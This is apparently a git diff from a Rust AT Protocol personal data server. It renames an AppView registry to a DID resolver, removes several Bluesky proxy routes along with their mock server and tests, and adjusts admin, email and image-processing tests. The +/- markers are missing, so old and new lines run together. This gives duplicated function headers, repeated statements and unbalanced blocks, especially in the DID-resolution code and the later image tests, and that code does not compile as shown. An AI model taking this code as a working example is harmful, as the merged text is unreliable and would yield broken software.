self.get_appview_for_namespace(&namespace).await
}
pub async fn get_appview_for_namespace(&self, namespace: &str) -> Option<ResolvedAppView> {
let did = self.get_did_for_namespace(namespace)?;
self.resolve_appview_did(&did).await
}
pub fn get_did_for_namespace(&self, namespace: &str) -> Option<String> {
if let Some(did) = self.namespace_to_did.get(namespace) {
return Some(did.clone());
}
let mut parts: Vec<&str> = namespace.split('.').collect();
while !parts.is_empty() {
let prefix = parts.join(".");
if let Some(did) = self.namespace_to_did.get(&prefix) {
return Some(did.clone());
}
parts.pop();
}
None
}
pub async fn resolve_appview_did(&self, did: &str) -> Option<ResolvedAppView> {
pub async fn resolve_did(&self, did: &str) -> Option<ResolvedService> {
{
let cache = self.did_cache.read().await;
if let Some(cached) = cache.get(did) {
if cached.resolved_at.elapsed() < self.cache_ttl {
return Some(ResolvedAppView {
return Some(ResolvedService {
url: cached.url.clone(),
did: cached.did.clone(),
});
@@ -156,7 +99,7 @@ impl AppViewRegistry {
let mut cache = self.did_cache.write().await;
cache.insert(
did.to_string(),
CachedAppView {
CachedDid {
url: resolved.url.clone(),
did: resolved.did.clone(),
resolved_at: Instant::now(),
@@ -167,7 +110,7 @@ impl AppViewRegistry {
Some(resolved)
}
async fn resolve_did_internal(&self, did: &str) -> Option<ResolvedAppView> {
async fn resolve_did_internal(&self, did: &str) -> Option<ResolvedService> {
let did_doc = if did.starts_with("did:web:") {
self.resolve_did_web(did).await
} else if did.starts_with("did:plc:") {
@@ -185,7 +128,7 @@ impl AppViewRegistry {
}
};
self.extract_appview_endpoint(&doc)
self.extract_service_endpoint(&doc)
}
async fn resolve_did_web(&self, did: &str) -> Result<DidDocument, String> {
@@ -275,13 +218,13 @@ impl AppViewRegistry {
.map_err(|e| format!("Failed to parse DID document: {}", e))
}
fn extract_appview_endpoint(&self, doc: &DidDocument) -> Option<ResolvedAppView> {
fn extract_service_endpoint(&self, doc: &DidDocument) -> Option<ResolvedService> {
for service in &doc.service {
if service.service_type == "AtprotoAppView"
|| service.id.contains("atproto_appview")
|| service.id.ends_with("#bsky_appview")
{
return Some(ResolvedAppView {
return Some(ResolvedService {
url: service.service_endpoint.clone(),
did: doc.id.clone(),
});
@@ -290,7 +233,7 @@ impl AppViewRegistry {
for service in &doc.service {
if service.service_type.contains("AppView") || service.id.contains("appview") {
return Some(ResolvedAppView {
return Some(ResolvedService {
url: service.service_endpoint.clone(),
did: doc.id.clone(),
});
@@ -303,7 +246,7 @@ impl AppViewRegistry {
"No explicit AppView service found for {}, using first service: {}",
doc.id, service.service_endpoint
);
return Some(ResolvedAppView {
return Some(ResolvedService {
url: service.service_endpoint.clone(),
did: doc.id.clone(),
});
@@ -326,7 +269,7 @@ impl AppViewRegistry {
"No service found for {}, deriving URL from DID: {}://{}",
doc.id, scheme, base_host
);
return Some(ResolvedAppView {
return Some(ResolvedService {
url: format!("{}://{}", scheme, base_host),
did: doc.id.clone(),
});
@@ -335,79 +278,18 @@ impl AppViewRegistry {
None
}
fn extract_namespace(&self, method: &str) -> Option<String> {
let parts: Vec<&str> = method.split('.').collect();
if parts.len() >= 2 {
Some(format!("{}.{}", parts[0], parts[1]))
} else {
None
}
}
pub fn list_namespaces(&self) -> Vec<(String, String)> {
self.namespace_to_did
.iter()
.map(|(k, v)| (k.clone(), v.clone()))
.collect()
}
pub async fn invalidate_cache(&self, did: &str) {
let mut cache = self.did_cache.write().await;
cache.remove(did);
}
pub async fn invalidate_all_cache(&self) {
let mut cache = self.did_cache.write().await;
cache.clear();
}
}
impl Default for AppViewRegistry {
impl Default for DidResolver {
fn default() -> Self {
Self::new()
}
}
pub async fn get_appview_url_for_method(registry: &AppViewRegistry, method: &str) -> Option<String> {
registry.get_appview_for_method(method).await.map(|r| r.url)
}
pub async fn get_appview_did_for_method(registry: &AppViewRegistry, method: &str) -> Option<String> {
registry.get_appview_for_method(method).await.map(|r| r.did)
}
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn test_extract_namespace() {
let registry = AppViewRegistry::new();
assert_eq!(
registry.extract_namespace("app.bsky.actor.getProfile"),
Some("app.bsky".to_string())
);
assert_eq!(
registry.extract_namespace("com.atproto.repo.createRecord"),
Some("com.atproto".to_string())
);
assert_eq!(
registry.extract_namespace("com.whtwnd.blog.getPost"),
Some("com.whtwnd".to_string())
);
assert_eq!(registry.extract_namespace("invalid"), None);
}
#[test]
fn test_get_did_for_namespace() {
let mut registry = AppViewRegistry::new();
registry.register_namespace("com.whtwnd", "did:web:whtwnd.com");
assert!(registry.get_did_for_namespace("app.bsky").is_some());
assert_eq!(
registry.get_did_for_namespace("com.whtwnd"),
Some("did:web:whtwnd.com".to_string())
);
assert!(registry.get_did_for_namespace("unknown.namespace").is_none());
}
pub fn create_did_resolver() -> Arc<DidResolver> {
Arc::new(DidResolver::new())
}

View File

@@ -317,35 +317,6 @@ pub fn app(state: AppState) -> Router {
"/xrpc/app.bsky.actor.putPreferences",
post(api::actor::put_preferences),
)
.route(
"/xrpc/app.bsky.actor.getProfile",
get(api::actor::get_profile),
)
.route(
"/xrpc/app.bsky.actor.getProfiles",
get(api::actor::get_profiles),
)
.route(
"/xrpc/app.bsky.feed.getTimeline",
get(api::feed::get_timeline),
)
.route(
"/xrpc/app.bsky.feed.getAuthorFeed",
get(api::feed::get_author_feed),
)
.route(
"/xrpc/app.bsky.feed.getActorLikes",
get(api::feed::get_actor_likes),
)
.route(
"/xrpc/app.bsky.feed.getPostThread",
get(api::feed::get_post_thread),
)
.route("/xrpc/app.bsky.feed.getFeed", get(api::feed::get_feed))
.route(
"/xrpc/app.bsky.notification.registerPush",
post(api::notification::register_push),
)
.route("/.well-known/did.json", get(api::identity::well_known_did))
.route(
"/.well-known/atproto-did",

View File

@@ -1,4 +1,4 @@
use crate::appview::AppViewRegistry;
use crate::appview::DidResolver;
use crate::cache::{Cache, DistributedRateLimiter, create_cache};
use crate::circuit_breaker::CircuitBreakers;
use crate::config::AuthConfig;
@@ -20,7 +20,7 @@ pub struct AppState {
pub circuit_breakers: Arc<CircuitBreakers>,
pub cache: Arc<dyn Cache>,
pub distributed_rate_limiter: Arc<dyn DistributedRateLimiter>,
pub appview_registry: Arc<AppViewRegistry>,
pub did_resolver: Arc<DidResolver>,
}
pub enum RateLimitKind {
@@ -87,7 +87,7 @@ impl AppState {
let rate_limiters = Arc::new(RateLimiters::new());
let circuit_breakers = Arc::new(CircuitBreakers::new());
let (cache, distributed_rate_limiter) = create_cache().await;
let appview_registry = Arc::new(AppViewRegistry::new());
let did_resolver = Arc::new(DidResolver::new());
Self {
db,
@@ -98,7 +98,7 @@ impl AppState {
circuit_breakers,
cache,
distributed_rate_limiter,
appview_registry,
did_resolver,
}
}

View File

@@ -170,8 +170,9 @@ async fn test_update_email_via_notification_prefs() {
let pool = get_pool().await;
let (token, did) = create_account_and_login(&client).await;
let unique_email = format!("newemail_{}@example.com", uuid::Uuid::new_v4());
let prefs = json!({
"email": "newemail@example.com"
"email": unique_email
});
let resp = client
.post(format!("{}/xrpc/com.bspds.account.updateNotificationPrefs", base))
@@ -217,5 +218,5 @@ async fn test_update_email_via_notification_prefs() {
.await
.unwrap();
let body: Value = resp.json().await.unwrap();
assert_eq!(body["email"], "newemail@example.com");
assert_eq!(body["email"], unique_email);
}

View File

@@ -12,7 +12,7 @@ async fn test_search_accounts_as_admin() {
let (user_did, _) = setup_new_user("search-target").await;
let res = client
.get(format!(
"{}/xrpc/com.atproto.admin.searchAccounts",
"{}/xrpc/com.atproto.admin.searchAccounts?limit=1000",
base_url().await
))
.bearer_auth(&admin_jwt)
@@ -24,7 +24,7 @@ async fn test_search_accounts_as_admin() {
let accounts = body["accounts"].as_array().expect("accounts should be array");
assert!(!accounts.is_empty(), "Should return some accounts");
let found = accounts.iter().any(|a| a["did"].as_str() == Some(&user_did));
assert!(found, "Should find the created user in results");
assert!(found, "Should find the created user in results (DID: {})", user_did);
}
#[tokio::test]
@@ -111,6 +111,7 @@ async fn test_search_accounts_pagination() {
#[tokio::test]
async fn test_search_accounts_requires_admin() {
let client = client();
let _ = create_account_and_login(&client).await;
let (_, user_jwt) = setup_new_user("search-nonadmin").await;
let res = client
.get(format!(

View File

@@ -1,135 +0,0 @@
mod common;
use common::{base_url, client, create_account_and_login};
use reqwest::StatusCode;
use serde_json::{Value, json};
#[tokio::test]
async fn test_get_author_feed_returns_appview_data() {
let client = client();
let base = base_url().await;
let (jwt, did) = create_account_and_login(&client).await;
let res = client
.get(format!(
"{}/xrpc/app.bsky.feed.getAuthorFeed?actor={}",
base, did
))
.header("Authorization", format!("Bearer {}", jwt))
.send()
.await
.unwrap();
assert_eq!(res.status(), StatusCode::OK);
let body: Value = res.json().await.unwrap();
assert!(body["feed"].is_array(), "Response should have feed array");
let feed = body["feed"].as_array().unwrap();
assert_eq!(feed.len(), 1, "Feed should have 1 post from appview");
assert_eq!(
feed[0]["post"]["record"]["text"].as_str(),
Some("Author feed post from appview"),
"Post text should match appview response"
);
}
#[tokio::test]
async fn test_get_actor_likes_returns_appview_data() {
let client = client();
let base = base_url().await;
let (jwt, did) = create_account_and_login(&client).await;
let res = client
.get(format!(
"{}/xrpc/app.bsky.feed.getActorLikes?actor={}",
base, did
))
.header("Authorization", format!("Bearer {}", jwt))
.send()
.await
.unwrap();
assert_eq!(res.status(), StatusCode::OK);
let body: Value = res.json().await.unwrap();
assert!(body["feed"].is_array(), "Response should have feed array");
let feed = body["feed"].as_array().unwrap();
assert_eq!(feed.len(), 1, "Feed should have 1 liked post from appview");
assert_eq!(
feed[0]["post"]["record"]["text"].as_str(),
Some("Liked post from appview"),
"Post text should match appview response"
);
}
#[tokio::test]
async fn test_get_post_thread_returns_appview_data() {
let client = client();
let base = base_url().await;
let (jwt, did) = create_account_and_login(&client).await;
let res = client
.get(format!(
"{}/xrpc/app.bsky.feed.getPostThread?uri=at://{}/app.bsky.feed.post/test123",
base, did
))
.header("Authorization", format!("Bearer {}", jwt))
.send()
.await
.unwrap();
assert_eq!(res.status(), StatusCode::OK);
let body: Value = res.json().await.unwrap();
assert!(
body["thread"].is_object(),
"Response should have thread object"
);
assert_eq!(
body["thread"]["$type"].as_str(),
Some("app.bsky.feed.defs#threadViewPost"),
"Thread should be a threadViewPost"
);
assert_eq!(
body["thread"]["post"]["record"]["text"].as_str(),
Some("Thread post from appview"),
"Post text should match appview response"
);
}
#[tokio::test]
async fn test_get_feed_returns_appview_data() {
let client = client();
let base = base_url().await;
let (jwt, _did) = create_account_and_login(&client).await;
let res = client
.get(format!(
"{}/xrpc/app.bsky.feed.getFeed?feed=at://did:plc:test/app.bsky.feed.generator/test",
base
))
.header("Authorization", format!("Bearer {}", jwt))
.send()
.await
.unwrap();
assert_eq!(res.status(), StatusCode::OK);
let body: Value = res.json().await.unwrap();
assert!(body["feed"].is_array(), "Response should have feed array");
let feed = body["feed"].as_array().unwrap();
assert_eq!(feed.len(), 1, "Feed should have 1 post from appview");
assert_eq!(
feed[0]["post"]["record"]["text"].as_str(),
Some("Custom feed post from appview"),
"Post text should match appview response"
);
}
#[tokio::test]
async fn test_register_push_proxies_to_appview() {
let client = client();
let base = base_url().await;
let (jwt, _did) = create_account_and_login(&client).await;
let res = client
.post(format!("{}/xrpc/app.bsky.notification.registerPush", base))
.header("Authorization", format!("Bearer {}", jwt))
.json(&json!({
"serviceDid": "did:web:example.com",
"token": "test-push-token",
"platform": "ios",
"appId": "xyz.bsky.app"
}))
.send()
.await
.unwrap();
assert_eq!(res.status(), StatusCode::OK);
}

View File

@@ -141,9 +141,6 @@ async fn setup_with_external_infra() -> String {
let mock_host = mock_uri.strip_prefix("http://").unwrap_or(&mock_uri);
let mock_did = format!("did:web:{}", mock_host.replace(':', "%3A"));
setup_mock_did_document(&mock_server, &mock_did, &mock_uri).await;
unsafe {
std::env::set_var("APPVIEW_DID_APP_BSKY", &mock_did);
}
MOCK_APPVIEW.set(mock_server).ok();
spawn_app(database_url).await
}
@@ -194,9 +191,6 @@ async fn setup_with_testcontainers() -> String {
let mock_host = mock_uri.strip_prefix("http://").unwrap_or(&mock_uri);
let mock_did = format!("did:web:{}", mock_host.replace(':', "%3A"));
setup_mock_did_document(&mock_server, &mock_did, &mock_uri).await;
unsafe {
std::env::set_var("APPVIEW_DID_APP_BSKY", &mock_did);
}
MOCK_APPVIEW.set(mock_server).ok();
S3_CONTAINER.set(s3_container).ok();
let container = Postgres::default()
@@ -238,134 +232,7 @@ async fn setup_mock_did_document(mock_server: &MockServer, did: &str, service_en
.await;
}
async fn setup_mock_appview(mock_server: &MockServer) {
Mock::given(method("GET"))
.and(path("/xrpc/app.bsky.actor.getProfile"))
.respond_with(ResponseTemplate::new(200).set_body_json(json!({
"handle": "mock.handle",
"did": "did:plc:mock",
"displayName": "Mock User"
})))
.mount(mock_server)
.await;
Mock::given(method("GET"))
.and(path("/xrpc/app.bsky.actor.searchActors"))
.respond_with(ResponseTemplate::new(200).set_body_json(json!({
"actors": [],
"cursor": null
})))
.mount(mock_server)
.await;
Mock::given(method("GET"))
.and(path("/xrpc/app.bsky.feed.getTimeline"))
.respond_with(
ResponseTemplate::new(200)
.insert_header("atproto-repo-rev", "0")
.set_body_json(json!({
"feed": [],
"cursor": null
})),
)
.mount(mock_server)
.await;
Mock::given(method("GET"))
.and(path("/xrpc/app.bsky.feed.getAuthorFeed"))
.respond_with(
ResponseTemplate::new(200)
.insert_header("atproto-repo-rev", "0")
.set_body_json(json!({
"feed": [{
"post": {
"uri": "at://did:plc:mock-author/app.bsky.feed.post/from-appview-author",
"cid": "bafyappview123",
"author": {"did": "did:plc:mock-author", "handle": "mock.author"},
"record": {
"$type": "app.bsky.feed.post",
"text": "Author feed post from appview",
"createdAt": "2025-01-01T00:00:00Z"
},
"indexedAt": "2025-01-01T00:00:00Z"
}
}],
"cursor": "author-cursor"
})),
)
.mount(mock_server)
.await;
Mock::given(method("GET"))
.and(path("/xrpc/app.bsky.feed.getActorLikes"))
.respond_with(
ResponseTemplate::new(200)
.insert_header("atproto-repo-rev", "0")
.set_body_json(json!({
"feed": [{
"post": {
"uri": "at://did:plc:mock-likes/app.bsky.feed.post/liked-post",
"cid": "bafyliked123",
"author": {"did": "did:plc:mock-likes", "handle": "mock.likes"},
"record": {
"$type": "app.bsky.feed.post",
"text": "Liked post from appview",
"createdAt": "2025-01-01T00:00:00Z"
},
"indexedAt": "2025-01-01T00:00:00Z"
}
}],
"cursor": null
})),
)
.mount(mock_server)
.await;
Mock::given(method("GET"))
.and(path("/xrpc/app.bsky.feed.getPostThread"))
.respond_with(
ResponseTemplate::new(200)
.insert_header("atproto-repo-rev", "0")
.set_body_json(json!({
"thread": {
"$type": "app.bsky.feed.defs#threadViewPost",
"post": {
"uri": "at://did:plc:mock/app.bsky.feed.post/thread-post",
"cid": "bafythread123",
"author": {"did": "did:plc:mock", "handle": "mock.handle"},
"record": {
"$type": "app.bsky.feed.post",
"text": "Thread post from appview",
"createdAt": "2025-01-01T00:00:00Z"
},
"indexedAt": "2025-01-01T00:00:00Z"
},
"replies": []
}
})),
)
.mount(mock_server)
.await;
Mock::given(method("GET"))
.and(path("/xrpc/app.bsky.feed.getFeed"))
.respond_with(ResponseTemplate::new(200).set_body_json(json!({
"feed": [{
"post": {
"uri": "at://did:plc:mock-feed/app.bsky.feed.post/custom-feed-post",
"cid": "bafyfeed123",
"author": {"did": "did:plc:mock-feed", "handle": "mock.feed"},
"record": {
"$type": "app.bsky.feed.post",
"text": "Custom feed post from appview",
"createdAt": "2025-01-01T00:00:00Z"
},
"indexedAt": "2025-01-01T00:00:00Z"
}
}],
"cursor": null
})))
.mount(mock_server)
.await;
Mock::given(method("POST"))
.and(path("/xrpc/app.bsky.notification.registerPush"))
.respond_with(ResponseTemplate::new(200))
.mount(mock_server)
.await;
async fn setup_mock_appview(_mock_server: &MockServer) {
}
async fn spawn_app(database_url: String) -> String {

View File

@@ -1,104 +0,0 @@
mod common;
use common::{base_url, client, create_account_and_login};
use serde_json::json;
#[tokio::test]
async fn test_get_timeline_requires_auth() {
let client = client();
let base = base_url().await;
let res = client
.get(format!("{}/xrpc/app.bsky.feed.getTimeline", base))
.send()
.await
.unwrap();
assert_eq!(res.status(), 401);
}
#[tokio::test]
async fn test_get_author_feed_requires_actor() {
let client = client();
let base = base_url().await;
let (jwt, _did) = create_account_and_login(&client).await;
let res = client
.get(format!("{}/xrpc/app.bsky.feed.getAuthorFeed", base))
.header("Authorization", format!("Bearer {}", jwt))
.send()
.await
.unwrap();
assert_eq!(res.status(), 400);
}
#[tokio::test]
async fn test_get_actor_likes_requires_actor() {
let client = client();
let base = base_url().await;
let (jwt, _did) = create_account_and_login(&client).await;
let res = client
.get(format!("{}/xrpc/app.bsky.feed.getActorLikes", base))
.header("Authorization", format!("Bearer {}", jwt))
.send()
.await
.unwrap();
assert_eq!(res.status(), 400);
}
#[tokio::test]
async fn test_get_post_thread_requires_uri() {
let client = client();
let base = base_url().await;
let (jwt, _did) = create_account_and_login(&client).await;
let res = client
.get(format!("{}/xrpc/app.bsky.feed.getPostThread", base))
.header("Authorization", format!("Bearer {}", jwt))
.send()
.await
.unwrap();
assert_eq!(res.status(), 400);
}
#[tokio::test]
async fn test_get_feed_requires_auth() {
let client = client();
let base = base_url().await;
let res = client
.get(format!(
"{}/xrpc/app.bsky.feed.getFeed?feed=at://did:plc:test/app.bsky.feed.generator/test",
base
))
.send()
.await
.unwrap();
assert_eq!(res.status(), 401);
}
#[tokio::test]
async fn test_get_feed_requires_feed_param() {
let client = client();
let base = base_url().await;
let (jwt, _did) = create_account_and_login(&client).await;
let res = client
.get(format!("{}/xrpc/app.bsky.feed.getFeed", base))
.header("Authorization", format!("Bearer {}", jwt))
.send()
.await
.unwrap();
assert_eq!(res.status(), 400);
}
#[tokio::test]
async fn test_register_push_requires_auth() {
    // registerPush without a bearer token must be rejected with 401,
    // even when the request body itself is valid.
    let http = client();
    let base = base_url().await;
    let payload = json!({
        "serviceDid": "did:web:example.com",
        "token": "test-token",
        "platform": "ios",
        "appId": "xyz.bsky.app"
    });
    let response = http
        .post(format!("{}/xrpc/app.bsky.notification.registerPush", base))
        .json(&payload)
        .send()
        .await
        .unwrap();
    assert_eq!(response.status(), 401);
}

View File

@@ -8,223 +8,154 @@ use std::io::Cursor;
/// Encode a solid RGB8 image of the given dimensions as a PNG byte buffer.
fn create_test_png(width: u32, height: u32) -> Vec<u8> {
    let img = DynamicImage::new_rgb8(width, height);
    let mut buf = Vec::new();
    // Encode exactly once: the duplicated `write_to` left behind by a bad
    // merge/diff would append a second complete PNG stream to `buf`.
    img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Png)
        .unwrap();
    buf
}
/// Encode a solid RGB8 image of the given dimensions as a JPEG byte buffer.
fn create_test_jpeg(width: u32, height: u32) -> Vec<u8> {
    let img = DynamicImage::new_rgb8(width, height);
    let mut buf = Vec::new();
    // Single encode; the duplicated call was diff residue and doubled the output.
    img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Jpeg)
        .unwrap();
    buf
}
/// Encode a solid RGB8 image of the given dimensions as a GIF byte buffer.
fn create_test_gif(width: u32, height: u32) -> Vec<u8> {
    let img = DynamicImage::new_rgb8(width, height);
    let mut buf = Vec::new();
    // Single encode; the duplicated call was diff residue and doubled the output.
    img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Gif)
        .unwrap();
    buf
}
/// Encode a solid RGB8 image of the given dimensions as a WebP byte buffer.
fn create_test_webp(width: u32, height: u32) -> Vec<u8> {
    let img = DynamicImage::new_rgb8(width, height);
    let mut buf = Vec::new();
    // Single encode; the duplicated call was diff residue and doubled the output.
    img.write_to(&mut Cursor::new(&mut buf), ImageFormat::WebP)
        .unwrap();
    buf
}
#[test]
fn test_format_support() {
    // Consolidated decode test: each supported input format must round-trip
    // through `process` with its dimensions preserved.
    // (This span was interleaved old/new diff lines — two `fn` headers,
    // duplicated statements, unbalanced braces — resolved to the merged test.)
    let processor = ImageProcessor::new();
    let png = create_test_png(500, 500);
    let result = processor.process(&png, "image/png").unwrap();
    assert_eq!(result.original.width, 500);
    assert_eq!(result.original.height, 500);
    let jpeg = create_test_jpeg(400, 300);
    let result = processor.process(&jpeg, "image/jpeg").unwrap();
    assert_eq!(result.original.width, 400);
    assert_eq!(result.original.height, 300);
    let gif = create_test_gif(200, 200);
    let result = processor.process(&gif, "image/gif").unwrap();
    assert_eq!(result.original.width, 200);
    assert_eq!(result.original.height, 200);
    let webp = create_test_webp(300, 200);
    let result = processor.process(&webp, "image/webp").unwrap();
    assert_eq!(result.original.width, 300);
    assert_eq!(result.original.height, 200);
}
#[test]
fn test_thumbnail_generation() {
    // Thumbnail policy across size classes: none below the feed threshold,
    // feed-only in between, both above the full threshold; thresholds are
    // strict (> not >=); with_thumbnails(false) suppresses everything.
    // (Reconstructed from interleaved diff residue in this span.)
    let processor = ImageProcessor::new();
    let small = create_test_png(100, 100);
    let result = processor.process(&small, "image/png").unwrap();
    assert!(result.thumbnail_feed.is_none(), "Small image should not get feed thumbnail");
    assert!(result.thumbnail_full.is_none(), "Small image should not get full thumbnail");
    let medium = create_test_png(500, 500);
    let result = processor.process(&medium, "image/png").unwrap();
    assert!(result.thumbnail_feed.is_some(), "Medium image should have feed thumbnail");
    assert!(result.thumbnail_full.is_none(), "Medium image should NOT have full thumbnail");
    let large = create_test_png(2000, 2000);
    let result = processor.process(&large, "image/png").unwrap();
    assert!(result.thumbnail_feed.is_some(), "Large image should have feed thumbnail");
    assert!(result.thumbnail_full.is_some(), "Large image should have full thumbnail");
    let thumb = result.thumbnail_feed.unwrap();
    assert!(thumb.width <= THUMB_SIZE_FEED && thumb.height <= THUMB_SIZE_FEED);
    let full = result.thumbnail_full.unwrap();
    assert!(full.width <= THUMB_SIZE_FULL && full.height <= THUMB_SIZE_FULL);
    let at_feed = create_test_png(THUMB_SIZE_FEED, THUMB_SIZE_FEED);
    let above_feed = create_test_png(THUMB_SIZE_FEED + 1, THUMB_SIZE_FEED + 1);
    assert!(processor.process(&at_feed, "image/png").unwrap().thumbnail_feed.is_none());
    assert!(processor.process(&above_feed, "image/png").unwrap().thumbnail_feed.is_some());
    let at_full = create_test_png(THUMB_SIZE_FULL, THUMB_SIZE_FULL);
    let above_full = create_test_png(THUMB_SIZE_FULL + 1, THUMB_SIZE_FULL + 1);
    assert!(processor.process(&at_full, "image/png").unwrap().thumbnail_full.is_none());
    assert!(processor.process(&above_full, "image/png").unwrap().thumbnail_full.is_some());
    let disabled = ImageProcessor::new().with_thumbnails(false);
    let result = disabled.process(&large, "image/png").unwrap();
    assert!(result.thumbnail_feed.is_none() && result.thumbnail_full.is_none());
}
#[test]
fn test_output_format_conversion() {
    // Each OutputFormat selection must change the reported mime type of the
    // processed original. (Reconstructed from interleaved diff residue.)
    let png = create_test_png(300, 300);
    let jpeg = create_test_jpeg(300, 300);
    let webp_proc = ImageProcessor::new().with_output_format(OutputFormat::WebP);
    assert_eq!(webp_proc.process(&png, "image/png").unwrap().original.mime_type, "image/webp");
    let jpeg_proc = ImageProcessor::new().with_output_format(OutputFormat::Jpeg);
    assert_eq!(jpeg_proc.process(&png, "image/png").unwrap().original.mime_type, "image/jpeg");
    let png_proc = ImageProcessor::new().with_output_format(OutputFormat::Png);
    assert_eq!(png_proc.process(&jpeg, "image/jpeg").unwrap().original.mime_type, "image/png");
}
#[test]
fn test_no_thumbnail_small_image() {
    // Images already smaller than every thumbnail threshold pass through untouched.
    let tiny = create_test_png(100, 100);
    let processed = ImageProcessor::new().process(&tiny, "image/png").unwrap();
    assert!(
        processed.thumbnail_feed.is_none(),
        "Small image should not get feed thumbnail"
    );
    assert!(
        processed.thumbnail_full.is_none(),
        "Small image should not get full thumbnail"
    );
}
#[test]
fn test_webp_conversion() {
    // Selecting WebP output re-encodes a PNG input and reports the new mime type.
    let converter = ImageProcessor::new().with_output_format(OutputFormat::WebP);
    let source = create_test_png(300, 300);
    let processed = converter.process(&source, "image/png").unwrap();
    assert_eq!(processed.original.mime_type, "image/webp");
}
#[test]
fn test_jpeg_output_format() {
    // Selecting JPEG output re-encodes a PNG input and reports the new mime type.
    let converter = ImageProcessor::new().with_output_format(OutputFormat::Jpeg);
    let source = create_test_png(300, 300);
    let processed = converter.process(&source, "image/png").unwrap();
    assert_eq!(processed.original.mime_type, "image/jpeg");
}
#[test]
fn test_png_output_format() {
    // Selecting PNG output re-encodes a JPEG input and reports the new mime type.
    let converter = ImageProcessor::new().with_output_format(OutputFormat::Png);
    let source = create_test_jpeg(300, 300);
    let processed = converter.process(&source, "image/jpeg").unwrap();
    assert_eq!(processed.original.mime_type, "image/png");
}
#[test]
fn test_max_dimension_enforced() {
    // A 2000px image against a 1000px cap must fail with TooLarge carrying
    // the offending dimensions and the configured limit.
    let processor = ImageProcessor::new().with_max_dimension(1000);
    let oversized = create_test_png(2000, 2000);
    let outcome = processor.process(&oversized, "image/png");
    assert!(matches!(outcome, Err(ImageError::TooLarge { .. })));
    if let Err(ImageError::TooLarge { width, height, max_dimension }) = outcome {
        assert_eq!(width, 2000);
        assert_eq!(height, 2000);
        assert_eq!(max_dimension, 1000);
    }
}
#[test]
fn test_file_size_limit() {
    // A 100-byte cap rejects any real PNG; the error reports the cap and actual size.
    let strict = ImageProcessor::new().with_max_file_size(100);
    let png = create_test_png(500, 500);
    let outcome = strict.process(&png, "image/png");
    assert!(matches!(outcome, Err(ImageError::FileTooLarge { .. })));
    if let Err(ImageError::FileTooLarge { size, max_size }) = outcome {
        assert!(size > 100);
        assert_eq!(max_size, 100);
    }
}
#[test]
fn test_size_and_dimension_limits() {
    // Default file-size cap plus both limit errors in one consolidated test.
    // (Reconstructed from interleaved diff residue: two fn headers in the span.)
    assert_eq!(DEFAULT_MAX_FILE_SIZE, 10 * 1024 * 1024);
    let max_dim = ImageProcessor::new().with_max_dimension(1000);
    let large = create_test_png(2000, 2000);
    let result = max_dim.process(&large, "image/png");
    assert!(matches!(result, Err(ImageError::TooLarge { width: 2000, height: 2000, max_dimension: 1000 })));
    let max_file = ImageProcessor::new().with_max_file_size(100);
    let data = create_test_png(500, 500);
    let result = max_file.process(&data, "image/png");
    assert!(matches!(result, Err(ImageError::FileTooLarge { max_size: 100, .. })));
}
#[test]
fn test_error_handling() {
    // Non-image bytes with an opaque mime type must be rejected as unsupported.
    // (Reconstructed from interleaved diff residue: old header + duplicated body.)
    let processor = ImageProcessor::new();
    let result = processor.process(b"this is not an image", "application/octet-stream");
    assert!(matches!(result, Err(ImageError::UnsupportedFormat(_))));
}
#[test]
fn test_corrupted_image_handling() {
    // A valid PNG magic number followed by garbage must surface a DecodeError.
    // Diff residue had duplicated `let result` lines (decoding the input twice);
    // resolved to the single inline-literal form.
    let processor = ImageProcessor::new();
    let result = processor.process(b"\x89PNG\r\n\x1a\ncorrupted data here", "image/png");
    assert!(matches!(result, Err(ImageError::DecodeError(_))));
}
#[test]
fn test_aspect_ratio_preservation() {
    // Thumbnails must keep the original aspect ratio for both landscape and
    // portrait inputs (within a 0.1 tolerance).
    // (Reconstructed: two old tests were interleaved with the merged new one.)
    let processor = ImageProcessor::new();
    let landscape = create_test_png(1600, 800);
    let result = processor.process(&landscape, "image/png").unwrap();
    let thumb = result.thumbnail_full.unwrap();
    let original_ratio = 1600.0 / 800.0;
    let thumb_ratio = thumb.width as f64 / thumb.height as f64;
    assert!((original_ratio - thumb_ratio).abs() < 0.1);
    let portrait = create_test_png(800, 1600);
    let result = processor.process(&portrait, "image/png").unwrap();
    let thumb = result.thumbnail_full.unwrap();
    let original_ratio = 800.0 / 1600.0;
    let thumb_ratio = thumb.width as f64 / thumb.height as f64;
    assert!((original_ratio - thumb_ratio).abs() < 0.1);
}
#[test]
fn test_mime_type_detection_auto() {
let processor = ImageProcessor::new();
let data = create_test_png(100, 100);
let result = processor.process(&data, "application/octet-stream");
assert!(result.is_ok(), "Should detect PNG format from data");
}
#[test]
fn test_is_supported_mime_type() {
fn test_utilities_and_builder() {
assert!(ImageProcessor::is_supported_mime_type("image/jpeg"));
assert!(ImageProcessor::is_supported_mime_type("image/jpg"));
assert!(ImageProcessor::is_supported_mime_type("image/png"));
@@ -235,35 +166,16 @@ fn test_is_supported_mime_type() {
assert!(!ImageProcessor::is_supported_mime_type("image/bmp"));
assert!(!ImageProcessor::is_supported_mime_type("image/tiff"));
assert!(!ImageProcessor::is_supported_mime_type("text/plain"));
assert!(!ImageProcessor::is_supported_mime_type("application/json"));
}
#[test]
fn test_strip_exif() {
let data = create_test_jpeg(100, 100);
let result = ImageProcessor::strip_exif(&data);
assert!(result.is_ok());
let stripped = result.unwrap();
let data = create_test_png(100, 100);
let processor = ImageProcessor::new();
let result = processor.process(&data, "application/octet-stream");
assert!(result.is_ok(), "Should detect PNG format from data");
let jpeg = create_test_jpeg(100, 100);
let stripped = ImageProcessor::strip_exif(&jpeg).unwrap();
assert!(!stripped.is_empty());
}
#[test]
fn test_with_thumbnails_disabled() {
    // with_thumbnails(false) must suppress both variants even for huge inputs.
    let no_thumbs = ImageProcessor::new().with_thumbnails(false);
    let big = create_test_png(2000, 2000);
    let processed = no_thumbs.process(&big, "image/png").unwrap();
    assert!(
        processed.thumbnail_feed.is_none(),
        "Thumbnails should be disabled"
    );
    assert!(
        processed.thumbnail_full.is_none(),
        "Thumbnails should be disabled"
    );
}
#[test]
fn test_builder_chaining() {
let processor = ImageProcessor::new()
.with_max_dimension(2048)
.with_max_file_size(5 * 1024 * 1024)
@@ -272,79 +184,6 @@ fn test_builder_chaining() {
let data = create_test_png(500, 500);
let result = processor.process(&data, "image/png").unwrap();
assert_eq!(result.original.mime_type, "image/jpeg");
}
#[test]
fn test_processed_image_fields() {
